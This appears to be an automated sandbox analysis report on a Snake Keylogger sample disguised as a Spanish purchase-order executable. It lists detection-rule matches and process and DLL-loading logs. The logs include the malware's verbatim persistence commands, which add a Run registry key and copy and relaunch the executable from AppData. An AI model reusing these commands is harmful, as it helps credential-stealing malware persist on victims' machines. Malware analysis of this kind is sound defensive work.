Source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36624b2.4.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36624b2.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.37703a2.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.37703a2.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.37703a2.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000011.00000002.2326278811.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000016.00000002.2609226677.0000000000409000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.1534523636.0000000003770000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.1534523636.000000000361E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe PID: 7556, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: xload.exe PID: 5800, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: InstallUtil.exe PID: 2036, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe, p5.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36624b2.4.raw.unpack, ---.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36624b2.4.raw.unpack, ---.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36624b2.4.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.37703a2.0.raw.unpack, ---.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.37703a2.0.raw.unpack, ---.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.37703a2.0.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.37b3b58.1.raw.unpack, ---.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.37b3b58.1.raw.unpack, ---.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.37b3b58.1.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36e9442.3.raw.unpack, ---.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36e9442.3.raw.unpack, ---.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@23/7@5/5

Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.log

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8140:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7824:120:WilError_03

Source: CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe

ReversingLabs: Detection: 68%

Source: unknown	Process created: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe "C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe"
Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd" /c ping 127.0.0.1 -n 18 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "xload" /t REG_SZ /d "C:\Users\user\AppData\Roaming\xload.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 18
Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd" /c ping 127.0.0.1 -n 24 > nul && copy "C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe" "C:\Users\user\AppData\Roaming\xload.exe" && ping 127.0.0.1 -n 24 > nul && "C:\Users\user\AppData\Roaming\xload.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 24
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "xload" /t REG_SZ /d "C:\Users\user\AppData\Roaming\xload.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 24
Source: unknown	Process created: C:\Users\user\AppData\Roaming\xload.exe "C:\Users\user\AppData\Roaming\xload.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\xload.exe "C:\Users\user\AppData\Roaming\xload.exe"
Source: C:\Users\user\AppData\Roaming\xload.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Roaming\xload.exe "C:\Users\user\AppData\Roaming\xload.exe"
Source: C:\Users\user\AppData\Roaming\xload.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd" /c ping 127.0.0.1 -n 18 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "xload" /t REG_SZ /d "C:\Users\user\AppData\Roaming\xload.exe"	Jump to behavior
Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd" /c ping 127.0.0.1 -n 24 > nul && copy "C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe" "C:\Users\user\AppData\Roaming\xload.exe" && ping 127.0.0.1 -n 24 > nul && "C:\Users\user\AppData\Roaming\xload.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 18	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "xload" /t REG_SZ /d "C:\Users\user\AppData\Roaming\xload.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 24	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 24	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Roaming\xload.exe "C:\Users\user\AppData\Roaming\xload.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior

Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	Section loaded: acgenral.dll	Jump to behavior
Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: acgenral.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: acgenral.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\reg.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Section loaded: acgenral.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xload.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: apphelp.dll	Jump to behavior
